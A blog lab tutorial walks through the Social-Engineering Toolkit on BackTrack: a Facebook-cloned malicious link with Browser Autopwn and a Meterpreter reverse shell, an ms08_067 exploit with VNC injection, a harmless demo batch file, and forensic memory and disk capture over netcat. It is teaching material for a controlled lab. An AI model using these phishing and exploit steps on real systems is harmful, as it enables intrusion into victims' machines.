Chuyển đến nội dung chính

Hướng Dẫn Thực Hành - Social Engineering Toolkit (SET) : Lesson 3

{ Create Malicious Weblink, Install Virus, Capture Forensic Images }
Section 0. Background Information
  • What is the Social-Engineering Toolkit (SET)
    • The Social-Engineering Toolkit (SET) is a python-driven suite of custom tools which solely focuses on attacking the human element of penetration testing.
    • It's main purpose is to augment and simulate social-engineering attacks and allow the tester to effectively test how a targeted attack may succeed.
    • Social-Engineering toolkit available on backtrack like on backtrack 5, backbox, blackbuntu, Gnacktrack and other Linux distribution that are used for penetration testing.
  • Lab Notes
    • In this lab we will do the following:
      1. Use Set to Create a Malicious Web Link
      2. Create an addition VNC Session
      3. Install a Fake Virus
      4. Capture a Forensics Memory and Hard Disk Image.
  • Legal Disclaimer : Các bài lab chỉ dùng cho môi trường học tập, không thử nghiệm trên các hệ thống không có thẩm quyền.
Section 1. Configure BackTrack Virtual Machine Settings
  1. Open Your VMware Player
    • Instructions:
      1. On Your Host Computer, Go To
      2. Start --> All Program --> VMWare --> VMWare Player
  2. Edit BackTrack Virtual Machine Settings
    • Instructions:
      1. Highlight BackTrack5R1
      2. Click Edit virtual machine settings
  3. Edit Network Adapter
    • Instructions:
      1. Highlight Network Adapter
      2. Select Bridged
      3. Do not Click on the OK Button.

Section 2. Login to BackTrack
  1. Start BackTrack VM Instance
    • Instructions:
      1. Start Up VMWare Player
      2. Select BackTrack5R1
      3. Play virtual machine
  2. Login to BackTrack
    • Instructions:
      1. Login: root
      2. Password: toor or <whatever you changed it to>.
  3. Bring up the GNOME
    • Instructions:
      1. Type startx

Section 3. Open Console Terminal and Retrieve IP Address
  1. Open a console terminal
    • Instructions:
      1. Click on the console terminal
  2. Get IP Address
    • Instructions:
      1. ifconfig -a
    • Notes:
      • As indicated below, my IP address is 192.168.1.105.
      • Please record your IP address.

Section 4. Start the Social Engineering ToolKit
  1. Start Social Engineering ToolKit
    • Instructions:
      1. cd /pentest/exploits/set
      2. ./set
  2. Website Attack Vector
    • Instructions:
      1. Select 2
  3. Select Metasploit Browser Attack Method
    • Instructions:
      1. Select 2
  4. Select Web Templates
    • Instructions:
      1. Select 1
  5. Set Facebook Web Attack
    • Instructions:
      1. Select 4
  6. Enter Exploit
    • Instructions:
      1. 24) Metasploit Browser Autopwn (USE AT OWN RISK!)
  7. Set Payload
    • Instructions:
      1. Select 2) Windows Reverse_TCP Meterpreter
      2. Use Port 5555
  8. Exploits Prepared, Server Started
    • Instructions:
      1. Your are looking for the "--- Done, Found" before you Continue.
      2. Continue to next Section.
Section 5. Start Up Windows Machine
  • Social Engineering Note
    • Image how an attacker could embed the malicious link, created in previous Section, in an email to a possible victim.
    • This type of attack is especially dangerous because it crashes the victim's web browser, and the victim does not realize the Metasploit payload was injected and a session is now attached to a migrated notepad process.
  1. Booting up WindowsVulerable01
    • Instructions:
      1. Start up VMware Player
      2. Select WindowsVulerable01
      3. Edit Virtual Machine
  2. Configuring the Network Adapter
    • Instructions:
      1. Select Network Adapter
      2. Select Bridged Connection
      3. Select OK
  3. Play WindowVulnerable01
    • Instructions:
      1. Select Play virtual Machine
  4. WindowsVulerable01 Authentication
    • Instructions:
      1. Login as administrator

Section 6. Start Up a Web Browser
  1. Start Up Internet Explorer
    • Instructions:
      1. Start --> All Programs --> Internet Explorer
  2. Victim Clicks on Link
    • Instructions:
      1. Place the Malicious Web Link in the Address Bar.
        • In my case, http://192.168.1.105:8080
        • In your case, get the IP address from Section 4, Step 8.
    • Note:
      • The Web Browser will just crash.

Section 7. Entering the Victim's Machine
  1. Record Victim's IP Address
    • Instructions:
      1. Record the Victim's IP Address.
      2. Look for the line that starts with Session ID 1 (See Below).
  2. Create VNC Session to Victim's machine
    • Instructions:
      1. use windows/smb/ms08_067_netapi
      2. set PAYLOAD windows/vncinject/bind_tcp
      3. set RHOST 192.168.1.109
        • Note: This is the IP Address obtained in the previous step.
      4. exploit
  3. Viewing the Victim's Machine over VNC
    • Instructions:
      1. Now you have a VNC connection to the Victim's Machine.
      2. Pretty KooL right!!!
    • Proof of Lab Instructions #1:
      1. Click in the Metasploit Courtesy Shell
      2. date, press enter twice
      3. echo "Your Name"
        • Replace the string "Your Name" with your actual name.
        • i.e., echo "John Gray"
      4. PrtScn
      5. Paste into a word document
      6. Continue to Next Step
  4. Bring Up Internet Explorer
    • Instructions:
      1. Start --> Internet Explorer
  5. Download Fake Virus.
    • Instructions:
      1. Place "http://www.antoanthongtin.edu.vn/UNIX/BACKTRACK/lesson6/fake_virus.bat" into the address bar.
      2. Press Enter
      3. Click Save
      4. Continue to Next Step
  6. Save the Fake Virus.
    • Instructions:
      1. Navigate to "C:\tools\Virus Jar"
        • Create this directory if it does not already exist.
      2. Click Save
  7. Run the Fake Virus.
    • Instructions:
      1. Click the Run Button
  8. Viewing Results
    • Instructions:
      1. You will now see some messages stating your system was compromised.
        • Note, this is just a batch script that prints messages to a screen.
        • This was just an example of what an attacker could do once they compromised the victim's machine.
      2. Click on the Black Box and Press Enter.
  9. Delete the fake_virus.bat file
    • Instructions:
      1. Start --> My Computer
      2. Navigate to "C:\tools\Virus Jar"
      3. Right Click on fake_virus.bat
      4. Click Delete
      5. Send to Recycle Bin? Yes
  10. Delete the fake_virus.bat file for the Recycle Bin
    • Instructions:
      1. Navigate to the Recycle Bin
      2. Right Click on fake_virus.bat
      3. Click Delete
      4. Are you sure want to delete 'fake_virus.bat'? Yes
    • Notes:
      • We are completly removing this file, so we have a deleted file to both analyze and recover with preceding forensic labs.

Section 8. Start Up NetCat  Listener To Receive Physical Memory Dump From Helix
  1. Open a console terminal
    • Instructions:
      1. Click on the console terminal
  2. Get IP Address
    • Instructions:
      1. ifconfig -a
    • Notes:
      • As indicated below, my IP address is 192.168.1.105.
      • Please record your IP address.
     
  3. Start Up Netcat on BackTrack
    • Instructions:
      1. mkdir -p /FORENSICS/images/1/
      2. cd /FORENSICS/images/1/
      3. nc -l -vvv -p 8888 > WV01_PM_fake_virus.dd
        • Netcat will listen for Helix to send the Memory Image.
        • Nothing will be sent until you complete the following section.
      4. Continue to Next Section

Section 9. Start Helix to Send Physical Memory to BackTrack
  1. Edit Virtual Machine Settings
    • Instructions:
      1. Virtual Machine --> Virtual Machine Settings...
  2. Configure Windows to load the Helix iso as a CD/DVD
    • Instructions
      1. Select CD/DVD (IDE)
      2. Select the Use ISO image file
      3. Browse to where you saved the Helix iso.
        • Note:  In my case, I save it in the following location:
        • H:\BOOT ISO\Helix2008R1.iso
  3. Helix Screen
    • Instructions
      1. Select Accept
  4. Live Acquisition
    • Instructions
      1. Click on the Camera Icon.
      2. Select "\\PhysicalMemory" from the Source Dropdown Menu
      3. Select the NetCat Radio Button
      4. Destination IP: Provide BackTrack's IP Address.
        • Obtain BackTrack's IP in Section 8, Step 2.
        • In my case, it is 192.168.1.105.
        • In your case, it will be different.
      5. Port: 8888
        • This is the Listening NetCat Port on the BackTrack Server.
      6. Click Acquire
  5. Notice
    • Instructions
      1. Click Yes
  6. Helix Informational
    • Instructions
      1. You will see a black command prompt like below.
      2. Notice it will say "Copying Physical memory"
      3. DO NOT CONTINUE TO THE NEXT SECTION UNTIL the black box disappears

Section 10. Verify Physical Memory Dump on BackTrack
  1. Verify Image Byte Size
    • Instructions:
      1. ls -l WV01_PM_fake_virus.dd

Section 11. Start Up NetCat  Listener To Receive Hard Drive Image From Helix
  1. Start Up Netcat on BackTrack
    • Instructions:
      1. cd /FORENSICS/images/1/
      2. nc -l -vvv -p 8888 > WV01_HD_fake_virus.dd
        • Netcat will listen for Helix to send the Hard Drive Image.
        • Nothing will be sent until you complete the following section.
      3. Continue to Next Section

Section 12. Use Helix to Send Hard Disk Image to BackTrack
  1. Live Acquisition
    • Instructions:
      1. Click on the Camera Icon.
      2. Select "C:\ (Logical drive)" from the Source Dropdown Menu
      3. Select the NetCat Radio Button
      4. Destination IP: Provide BackTrack's IP Address.
        • Obtain BackTrack's IP in Section 8, Step 2.
        • In my case, it is 192.168.1.105.
        • In your case, it will be different.
      5. Port: 8888
        • This is the Listening NetCat Port on the BackTrack Server.
      6. Click Acquire
  2. Notice
    • Instructions
      1. Click Yes
  3. Helix Informational
    • Instructions
      1. You will see a black command prompt like below.
      2. Notice it will saying "Copying \\.\C to CONOUT$..."
      3. This 8GB copy will take about 30 minutes.
      4. DO NOT CONTINUE TO THE NEXT SECTION UNTIL the black box disappears

Section 13. Verify Hard Drive Image on BackTrack
  1. Verify Image Byte Size
    • Instructions:
      1. ls -l WV01*
      2. date
      3. echo "Your Name"
        • Replace the string "Your Name" with your actual name.
        • i.e., echo "John Gray"
    • Proof of Lab Instructions #2:
      1. PrtScn
      2. Paste into the previously created word document
Nhãn:

Bài đăng phổ biến từ blog này

Hack the Gibson VM (CTF Challenge)

It’s a boot2root challenge and it does not get over with getting root access. You have to find flag also. So let’s start. First of all download lab from https://download.vulnhub.com/gibson/gibson.ova Now open kali terminal and like always start with first step i.e. netdiscover netdiscover it shows all the hosts those are up in our network and from here we get our target ip. Target IP: 192.168.1.6 As our target is all set we are going to scan it with nmap which will show all the open ports. In this case open ports are only two i.e. 22 and 80. nmap –p- -A 192.168.1.6 As from the above result we have got 80 port open so we will open target ip in browser. It shows an accessible directory. Let’s try opening it as we cannot see anything important here. Oh no such luck with this also. It’s written the result will be found by brute force but there is no place where we can apply brute force. As we do not have any other option so let’s just go to view page source to see if we could get a...
Đọc thêm

Penetration Testing in PwnLab (CTF Challenge)

In this article we will walkthrough a root2boot penetration testing challenge i.e PwnLab. PwbLab is a vulnerbale framework, based on the concept of CTF (capture the flag), with a bit of security which is a little complicated to bypass. But it’s not impossible. So, let us learn how we can get its access. Download From Here Now to start let us, firstly, consider that we do not know the IP of the PwnLab, therefore search for the IP address before hand and for that there is a command that shows us all the IP’s present in our network, so go to the terminal of you Kali and type : netdiscover Target IP = 192.168.0.105 And to know that we start our penetration testing. So, first, we will now scan with nmap , we will apply an aggressive scan as it gives detailed information and is fast. The command is : nmap -A 192.168.0.105 We have the result of scanning and as you can see there are only three ports open and they are: 80, 111, 3306. Our target IP is 192.168.0.105 as its MAC Vendor is...
Đọc thêm

Metasploitable 2 vulnerability assessment

A vulnerability assessment is a crucial part in every penetration test and is the process of identifying and assessing vulnerabilities on a target system. In this part of the tutorial we will be assessing the vulnerabilities available on the network side of the Metasploitable 2 virtual machine. We will be assessing the web applications on the Metasploitable 2 machine in a later tutorial. In the previous Metasploit enumeration and fingerprinting tutorial we’ve learned that the Metasploitable 2 machine contains a lot of vulnerabilities. We have collected valuable information about the target system which we will be using to find known vulnerabilities both on- and offline. Exploitation of these vulnerabilities will be demonstrated in the next exploitation tutorial. In this tutorial we will be looking at a few different ways to perform vulnerability analysis. We will be manually searching for exploits, use scanning tools like Nmap with scripts and we will be...
Đọc thêm